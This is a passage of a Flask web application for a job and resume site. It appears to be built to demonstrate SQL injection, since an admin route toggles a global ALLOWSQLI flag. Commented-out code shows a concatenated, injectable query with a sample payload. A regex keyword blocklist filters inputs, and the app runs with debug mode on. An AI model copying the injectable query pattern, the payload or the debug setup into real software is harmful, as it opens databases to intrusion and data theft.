pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(type_name).lower())
if r:
logger.warning('type_name一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',username=current_user.username)
r = re.search(pattern, str(type_value).lower())
if r:
logger.warning('type_value一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',username=current_user.username)
r = re.search(pattern, str(type_pk).lower())
if r:
logger.warning('type_pk一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',username=current_user.username)
dic={}
dic['sid']=type_pk
dic['value']=type_value
if type_name=='username':
db.modify("update weboracle.users set username=:value where sid=:sid",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='user_type':
db.modify("update weboracle.users set user_type=:value where sid=:sid",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='EMail':
db.modify("update weboracle.users set e_mail=:value where sid=:sid",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
else :
return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',error='未知错误',username=current_user.username)
return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',error='修改成功',username=current_user.username)
else:
try:
ll=[]
results=db.select("select sid,username,user_type,E_mail,login_num,last_login_time from weboracle.users order by last_login_time desc",ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["sid"]=item[0]
dic["username"]=item[1]
dic["user_type"]=item[2]
dic["Email"]=item[3]
dic["login_num"]=item[4]
dic["last_login_time"]=item[5]
ll.append(dic)
return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',manager_user_result=ll,username=current_user.username)
except:
return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',error='服务器发生错误!!!',username=current_user.username)
finally:
db.close()
return render_template('manager_user.html',flags=ALLOWSQLI,form=form,URL='/manager_user',error='未查询到数据,请刷新重试!',username=current_user.username)
@app.route('/modify_self_info',methods=['GET','POST'])
@login_required
def modify_self_info():
form=SecrityForm()
db = DataBasePool()
db.connect(pool)
keys=request.form.get('search',None)
if keys != None:
try:
ll = []
d = {}
# print(keys)
d["sid"]=current_user.id
# '''以下方式存在注入漏洞'''
# #05%') OR ('ab' like '%a
# '''
# sql = "select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info where sid=:sid AND (stu_id like '%" + keys + "%' OR name like '%" + keys + "%' OR sex like '%" + keys + "%' OR to_char(birth_time,'yyyy/mm/dd') like '%" + keys + "%' OR education_background like '%" + keys + "%' OR school_of_graduation like '%" + keys+ "%' OR to_char(time_of_graduation,'yyyy-mm-dd') like '%" + keys+ "%' OR major like '%" + keys+ "%' OR resume like '%" + keys+ "%' OR phone_number like '%"+ keys+ "%' OR job_time like '%"+ keys+ "%' OR job_wanted like '%"+ keys + "%' OR salary like '%"+ keys + "%') order by stu_id desc"
# print(sql)
# results = db.select(sql, d)
# '''
# '''以下方式不存在漏洞'''
d["pattern"] = '%' + keys + '%'
results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info where sid=:sid AND ( stu_id like :pattern OR name like :pattern OR sex like :pattern OR to_char(birth_time,'yyyy/mm/dd') like :pattern OR education_background like :pattern OR school_of_graduation like :pattern OR to_char(time_of_graduation,'yyyy-mm-dd') like :pattern OR major like :pattern OR resume like :pattern OR phone_number like :pattern OR job_time like :pattern OR job_wanted like :pattern OR salary like :pattern) order by stu_id desc",d,ALLOWSQLI=ALLOWSQLI)
# print(results)
for item in results[1]:
dic = {}
dic["stu_id"] = item[0]
dic["name"] = item[1]
if str(item[2]) == "man " or str(item[2]) == "男 ":
dic["sex"] = '男'
else:
# print(str(item[2])+"?")
dic["sex"] = '女'
dic["birth_time"] = item[3]
dic["education_background"] = item[4]
dic["school_of_graduation"] = item[5]
dic["time_of_graduation"] = item[6]
dic["major"] = item[7]
dic["resume"] = item[8]
dic["phone_number"] = item[9]
dic["job_time"] = item[10]
dic["job_wanted"] = item[11]
dic["salary"] = item[12]
ll.append(dic)
return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',
modify_self_info_result=ll, username=current_user.username)
except:
return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',
error="服务器发生错误", username=current_user.username)
finally:
db.close()
return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',
error="为查询到数据", username=current_user.username)
if form.validate_on_submit():
if request.form.get('delete',None)!=None:
dic = {}
type_pk = request.form.get('pk', None)
dic['stu_id'] = type_pk
db.modify("delete from weboracle.student_info where stu_id=:stu_id", dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
ll=[]
d={}
d['sid']=current_user.id
results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info where sid=:sid",d,ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["stu_id"]=item[0]
dic["name"]=item[1]
if str(item[2])=="man " or str(item[2])=="男 ":
dic["sex"]='男'
else:
dic["sex"]='女'
dic["birth_time"]=item[3]
dic["education_background"]=item[4]
dic["school_of_graduation"]=item[5]
dic["time_of_graduation"]=item[6]
dic["major"]=item[7]
dic["resume"]=item[8]
dic["phone_number"]=item[9]
dic["job_time"]=item[10]
dic["job_wanted"]=item[11]
dic["salary"]=item[12]
ll.append(dic)
return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',
modify_self_info_result=ll, username=current_user.username)
# None=request.form.get('delete', None)
type_name = request.form.get('name', None)
type_value = request.form.get('value', None)
type_pk = request.form.get('pk', None)
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(type_name).lower())
if r:
logger.warning('type_name一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',username=current_user.username)
r = re.search(pattern, str(type_value).lower())
if r:
logger.warning('type_value一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',username=current_user.username)
r = re.search(pattern, str(type_pk).lower())
if r:
logger.warning('type_pk一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/modify_self_info',username=current_user.username)
dic={}
dic['stu_id']=type_pk
dic['value']=type_value
# print(dic)
if type_name=='names':
db.modify("update weboracle.student_info set name=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='sex':
db.modify("update weboracle.student_info set sex=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='birth_time':
db.modify("update weboracle.student_info set birth_time=to_date(:value,'yyyy-mm-dd') where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='education_background':
db.modify("update weboracle.student_info set education_background=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='time_of_graduation':
db.modify("update weboracle.student_info set time_of_graduation=to_date(:value,'yyyy-mm-dd') where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='school_of_graduation':
db.modify("update weboracle.student_info set school_of_graduation=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='major':
db.modify("update weboracle.student_info set major=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='phone_number':
db.modify("update weboracle.student_info set phone_number=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='job_wanted':
db.modify("update weboracle.student_info set job_wanted=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='job_time':
db.modify("update weboracle.student_info set job_time=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='salary':
db.modify("update weboracle.student_info set salary=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='resume':
db.modify("update weboracle.student_info set resume=:value where stu_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
else :
return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='未知错误',username=current_user.username)
return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='修改成功',username=current_user.username)
else:
try:
db=DataBasePool()
db.connect(pool)
ll=[]
d={}
d['sid']=current_user.id
results=db.select("select stu_id,name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info where sid=:sid",d,ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["stu_id"]=item[0]
dic["name"]=item[1]
if str(item[2])=="man " or str(item[2])=="男 ":
dic["sex"]='男'
else:
# print(str(item[2])+"?")
dic["sex"]='女'
dic["birth_time"]=item[3]
dic["education_background"]=item[4]
dic["school_of_graduation"]=item[5]
dic["time_of_graduation"]=item[6]
dic["major"]=item[7]
dic["resume"]=item[8]
dic["phone_number"]=item[9]
dic["job_time"]=item[10]
dic["job_wanted"]=item[11]
dic["salary"]=item[12]
ll.append(dic)
return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',modify_self_info_result=ll,username=current_user.username)
except:
return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='服务器发生错误!!!',username=current_user.username)
finally:
db.close()
return render_template('modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/modify_self_info',error='未查询到数据,请刷新重试!',username=current_user.username)
@app.route('/person_resume')
@login_required
def person_resume():
form=SecrityForm()
url= request.args.get('jobID')
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(url).lower())
if r:
logger.warning('url一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('person_resume.html',flags=ALLOWSQLI,form=form, username=current_user.username)
# print(url)
if url!=None:
db=DataBasePool()
db.connect(pool)
try:
ll=[]
d={}
d['stu_id']=url
results=db.select("select name,sex,to_char(birth_time,'yyyy/mm/dd'),education_background,school_of_graduation,to_char(time_of_graduation,'yyyy-mm-dd'),major,resume,phone_number,job_time,job_wanted,salary from weboracle.student_info where stu_id=:stu_id",d,ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["name"]=item[0]
if str(item[1])=="man ":
dic["sex"]='男'
else:
# print(str(item[2])+"?")
dic["sex"]='女'
dic["birth_time"]=str(calculate_age(item[2]))+'岁'
dic["education_background"]=item[3]
dic["school_of_graduation"]=item[4]
dic["time_of_graduation"]=item[5]
dic["major"]=item[6]
dic["resume"]=item[7]
dic["phone_number"]=item[8]
dic["job_time"]=item[9]
dic["job_wanted"]=item[10]
dic["salary"]=item[11]
ll.append(dic)
return render_template('person_resume.html',flags=ALLOWSQLI,form=form,person_resume_result=ll, username=current_user.username)
except:
return render_template('person_resume.html',flags=ALLOWSQLI,form=form,error='服务器发送错误,请重试!', username=current_user.username)
finally:
db.close()
return render_template('person_resume.html',flags=ALLOWSQLI,form=form,error='服务器发送错误,请重试!', username=current_user.username)
else:
return render_template('person_resume.html',flags=ALLOWSQLI,form=form,error='没有查询到结果,请返回重试', username=current_user.username)
@app.route('/company_resume')
@login_required
def company_resume():
form=SecrityForm()
url= request.args.get('comID')
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(url).lower())
if r:
logger.warning('url一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_resume.html',flags=ALLOWSQLI,form=form, username=current_user.username)
# print(url)
if url!=None:
db=DataBasePool()
db.connect(pool)
try:
ll=[]
d={}
d['company_id']=url
results=db.select("select name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info where company_id=:company_id",d,ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["name"]=item[0]
dic["brief_introduce"]=item[1]
dic["address"]=item[2]
dic["contact_person"]=item[3]
dic["phone_number"]=item[4]
dic["person_num"]=item[5]
dic["requirement"]=item[6]
dic["time_of_end"]=item[7]
dic["workplace"]=item[8]
dic["salary"]=item[9]
dic["job_title"]=item[10]
ll.append(dic)
return render_template('company_resume.html',flags=ALLOWSQLI,form=form,company_resume_result=ll, username=current_user.username)
except:
return render_template('company_resume.html',flags=ALLOWSQLI,form=form,error='服务器发送错误,请重试!', username=current_user.username)
finally:
db.close()
return render_template('company_resume.html',flags=ALLOWSQLI,form=form,error='服务器发送错误,请重试!', username=current_user.username)
else:
return render_template('company_resume.html',flags=ALLOWSQLI,form=form,error='没有查询到结果,请返回重试', username=current_user.username)
@app.route('/company_modify_self_info',methods=['GET','POST'])
@login_required
def company_modify_self_info():
form=SecrityForm()
db = DataBasePool()
db.connect(pool)
keys = request.form.get('search', None)
if keys != None:
try:
ll = []
d = {}
d["sid"] = current_user.id
# '''以下方式存在注入漏洞'''
# # 05%') OR ('ab' like '%a
# sql="select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info where sid=:sid AND ( company_id like '%" + keys + "%' OR name like '%" + keys + "%' OR brief_introduce like '%" + keys + "%' OR address like '%" + keys + "%' OR contact_person like '%" + keys + "%' OR phone_number like '%" + keys + "%' OR person_num like '%" + keys + "%' OR requirement like '%" + keys + "%' OR time_of_end like '%" + keys + "%' OR workplace like '%" + keys + "%' OR salary like '%" + keys + "%' OR job_title like '%" + keys + "%') order by company_id desc"
# # print(sql)
# results = db.select(sql, d)
# '''以下方式不存在漏洞'''
d["pattern"] = '%' + keys + '%'
results = db.select(
"select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info where sid=:sid AND ( company_id like :pattern OR name like :pattern OR brief_introduce like :pattern OR address like :pattern OR contact_person like :pattern OR phone_number like :pattern OR person_num like :pattern OR requirement like :pattern OR time_of_end like :pattern OR workplace like :pattern OR salary like :pattern OR job_title like :pattern) order by company_id desc",
d,ALLOWSQLI=ALLOWSQLI)
# print(results)
for item in results[1]:
dic = {}
dic["company_id"] = item[0]
dic["name"] = item[1]
dic["brief_introduce"] = item[2]
dic["address"] = item[3]
dic["contact_person"] = item[4]
dic["phone_number"] = item[5]
dic["person_num"] = item[6]
dic["requirement"] = item[7]
dic["time_of_end"] = item[8]
dic["workplace"] = item[9]
dic["salary"] = item[10]
dic["job_title"] = item[11]
ll.append(dic)
return render_template('company_modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/company_modify_self_info',
company_modify_self_info_result=ll, username=current_user.username)
except:
return render_template('company_modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/company_modify_self_info',
error="服务器发生错误", username=current_user.username)
finally:
db.close()
return render_template('company_modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/company_modify_self_info',
error="为查询到数据", username=current_user.username)
if form.validate_on_submit():
if request.form.get('delete',None)!=None:
dic = {}
type_pk = request.form.get('pk', None)
dic['company_id'] = type_pk
db.modify("delete from weboracle.company_info where company_id=:company_id", dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
ll = []
d = {}
d['sid'] = current_user.id
results = db.select(
"select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info where sid=:sid order by time_of_end desc",
d,ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic = {}
dic["company_id"] = item[0]
dic["name"] = item[1]
dic["brief_introduce"] = item[2]
dic["address"] = item[3]
dic["contact_person"] = item[4]
dic["phone_number"] = item[5]
dic["person_num"] = item[6]
dic["requirement"] = item[7]
dic["time_of_end"] = item[8]
dic["workplace"] = item[9]
dic["salary"] = item[10]
dic["job_title"] = item[11]
ll.append(dic)
return render_template('company_modify_self_info.html',flags=ALLOWSQLI, form=form, URL='/company_modify_self_info',
company_modify_self_info_result=ll, username=current_user.username)
type_name = request.form.get('name', None)
type_value = request.form.get('value', None)
type_pk = request.form.get('pk', None)
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(type_name).lower())
if r:
logger.warning('type_name一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',username=current_user.username)
r = re.search(pattern, str(type_value).lower())
if r:
logger.warning('type_value一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',username=current_user.username)
r = re.search(pattern, str(type_pk).lower())
if r:
logger.warning('type_pk一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',username=current_user.username)
dic={}
dic['stu_id']=type_pk
dic['value']=type_value
if type_name=='company_name':
db.modify("update weboracle.company_info set name=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='brief_introduce':
db.modify("update weboracle.company_info set brief_introduce=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='address':
db.modify("update weboracle.company_info set address=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='job_type':
db.modify("update weboracle.company_info set job_title=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='company_dob':
db.modify("update weboracle.company_info set time_of_end=to_date(:value,'yyyy-mm-dd') where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='workplace':
db.modify("update weboracle.company_info set workplace=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='company_salary':
db.modify("update weboracle.company_info set salary=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='contact_person':
db.modify("update weboracle.company_info set contact_person=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='company_phone_number':
db.modify("update weboracle.company_info set phone_number=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='person_num':
db.modify("update weboracle.company_info set person_num=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
elif type_name=='company_comments':
db.modify("update weboracle.company_info set requirement=:value where company_id=:stu_id",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
else :
return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='未知错误',username=current_user.username)
return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='修改成功',username=current_user.username)
else:
try:
db=DataBasePool()
db.connect(pool)
ll=[]
d={}
d['sid']=current_user.id
results=db.select("select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info where sid=:sid order by time_of_end desc",d,ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["company_id"]=item[0]
dic["name"]=item[1]
dic["brief_introduce"]=item[2]
dic["address"]=item[3]
dic["contact_person"]=item[4]
dic["phone_number"]=item[5]
dic["person_num"]=item[6]
dic["requirement"]=item[7]
dic["time_of_end"]=item[8]
dic["workplace"]=item[9]
dic["salary"]=item[10]
dic["job_title"]=item[11]
ll.append(dic)
return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',company_modify_self_info_result=ll,username=current_user.username)
except:
return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='服务器发生错误!!!',username=current_user.username)
finally:
db.close()
return render_template('company_modify_self_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='未查询到数据,请刷新重试!',username=current_user.username)
@app.route('/company_manager_info',methods=['GET','POST'])
@login_required
@admin_required
def company_manager_info():
form=SecrityForm()
db=DataBasePool()
db.connect(pool)
if form.validate_on_submit():
if request.form.get('delete',None)!=None:
dic = {}
type_pk = request.form.get('pk', None)
dic['company_id'] = type_pk
db.modify("delete from weboracle.company_info where company_id=:company_id", dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
ll = []
results = db.select(
"select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info order by time_of_end desc",ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic = {}
dic["company_id"] = item[0]
dic["name"] = item[1]
dic["brief_introduce"] = item[2]
dic["address"] = item[3]
dic["contact_person"] = item[4]
dic["phone_number"] = item[5]
dic["person_num"] = item[6]
dic["requirement"] = item[7]
dic["time_of_end"] = item[8]
dic["workplace"] = item[9]
dic["salary"] = item[10]
dic["job_title"] = item[11]
ll.append(dic)
return render_template('company_manager_info.html',flags=ALLOWSQLI, form=form, URL='/company_modify_self_info',
error='删除成功',company_manager_info_result=ll, username=current_user.username)
return render_template('company_manager_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='成功',username=current_user.username)
else:
try:
ll=[]
results=db.select("select company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,time_of_end,workplace,salary,job_title from weboracle.company_info order by time_of_end desc",ALLOWSQLI=ALLOWSQLI)
for item in results[1]:
dic={}
dic["company_id"]=item[0]
dic["name"]=item[1]
dic["brief_introduce"]=item[2]
dic["address"]=item[3]
dic["contact_person"]=item[4]
dic["phone_number"]=item[5]
dic["person_num"]=item[6]
dic["requirement"]=item[7]
dic["time_of_end"]=item[8]
dic["workplace"]=item[9]
dic["salary"]=item[10]
dic["job_title"]=item[11]
ll.append(dic)
return render_template('company_manager_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',company_manager_info_result=ll,username=current_user.username)
except:
return render_template('company_manager_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='服务器发生错误!!!',username=current_user.username)
finally:
db.close()
return render_template('company_manager_info.html',flags=ALLOWSQLI,form=form,URL='/company_modify_self_info',error='未查询到数据,请刷新重试!',username=current_user.username)
@app.route('/company_info_modification',methods=['GET','POST'])
@login_required
def company_info_modification():
form = SecrityForm()
if form.validate_on_submit():
db=DataBasePool()
db.connect(pool)
try:
store_id=str(uuid.uuid4()).replace('-','')
company_name = request.form.get('val-company_name', None)
brief_introduce = request.form.get('val-brief_introduce', None)
address = request.form.get('val-address', None)
job_type = request.form.get('val-job_type', None)
time_of_end = request.form.get('time_of_end', None)
workplace = request.form.get('val-workplace', None)
company_salary = request.form.get('val-company_salary', None)
contact_person = request.form.get('val-contact_person', None)
phone_number = request.form.get('val-phone_number', None)
person_num = request.form.get('val-person_num', None)
company_suggestions = request.form.get('val-company_suggestions', None)
pattern = r"\b(and|like|exec|insert|select|drop|grant|alter|delete|update|count|chr|mid|master|truncate|char|delclare|or)\b|(\*|;)"
r = re.search(pattern, str(company_name).lower())
if r:
logger.warning('company_name一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form,username=current_user.username)
r = re.search(pattern, str(brief_introduce).lower())
if r:
logger.warning('brief_introduce一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(address).lower())
if r:
logger.warning('address一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(job_type).lower())
if r:
logger.warning('job_type一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(time_of_end).lower())
if r:
logger.warning('time_of_end一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(workplace).lower())
if r:
logger.warning('workplace一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(company_salary).lower())
if r:
logger.warning('company_salary一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(contact_person).lower())
if r:
logger.warning('contact_person一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(phone_number).lower())
if r:
logger.warning('phone_number一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(person_num).lower())
if r:
logger.warning('person_num一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
r = re.search(pattern, str(company_suggestions).lower())
if r:
logger.warning('company_suggestions一栏检测到非法输入:' + r.group() + '可能为恶意攻击.')
abort(405)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form, username=current_user.username)
dic={}
dic["company_id"]=store_id
dic["name"]=company_name
dic["brief_introduce"]=brief_introduce
dic["address"]=address
dic["contact_person"]=contact_person
dic["phone_number"]=phone_number
dic["person_num"]=person_num
dic["requirement"]=company_suggestions
dic["upload_time"]=datetime.now().strftime("%Y-%m-%d %H:%M:%S")
dic["time_of_end"]=time_of_end
dic["workplace"]=workplace
dic["salary"]=company_salary
dic["job_title"]=job_type
dic["sid"]=current_user.id
for value in dic.values():
# print(value)
if value=='':
return render_template('company_info_modification.html',flags=ALLOWSQLI,form=form,error='所有表格都为必填项,请重新填写!',username=current_user.username)
if is_number(phone_number)==False:
return render_template('company_info_modification.html',flags=ALLOWSQLI,form=form,error='电话号码格式错误,请重新填写!',username=current_user.username)
if is_number(person_num)==False:
return render_template('company_info_modification.html',flags=ALLOWSQLI,form=form,error='人数不是整数,请重新填写!',username=current_user.username)
db.modify("insert into weboracle.company_info (company_id,name,brief_introduce,address,contact_person,phone_number,person_num,requirement,upload_time,time_of_end,workplace,salary,job_title,sid)values(:company_id,:name,:brief_introduce,:address,:contact_person,:phone_number,:person_num,:requirement,to_date(:upload_time,'yyyy-mm-dd hh24:mi:ss'),to_date(:time_of_end,'yyyy-mm-dd'),:workplace,:salary,:job_title,:sid)",dic,ALLOWSQLI=ALLOWSQLI)
db.commit()
except:
db.rollback()
return render_template('company_info_modification.html',flags=ALLOWSQLI,form=form,error='服务器发生错误,请重试!',username=current_user.username)
finally:
db.close()
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form,info='发布成功!',username=current_user.username)
return render_template('company_info_modification.html',flags=ALLOWSQLI, form=form,username=current_user.username)
@app.route('/manager_sql/<flags>',methods=['GET','POST'])
@login_required
@admin_required
def manager_sql(flags):
global ALLOWSQLI
print('a'+flags+'a')
if flags=='False':
ALLOWSQLI=False
elif flags=='True':
print(1536)
ALLOWSQLI=True
else:
pass
return redirect(url_for('index'))
if __name__ == "__main__":
app.run(host='0.0.0.0',port=80,debug=True)
| 52.694585
| 781
| 0.598833
| 8,775
| 72,982
| 4.796923
| 0.047977
| 0.040909
| 0.057967
| 0.053311
| 0.846269
| 0.819329
| 0.796356
| 0.767681
| 0.747393
| 0.720927
| 0
| 0.008823
| 0.268532
| 72,982
| 1,384
| 782
| 52.732659
| 0.779672
| 0.046916
| 0
| 0.673667
| 1
| 0.028271
| 0.276479
| 0.130097
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019386
| false
| 0.023425
| 0.025848
| 0.000808
| 0.155897
| 0.002423
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0965d46c9eafc76879381bdbbdc82e89963c6a13
| 105
|
py
|
Python
|
views.py
|
half2me/gst-web
|
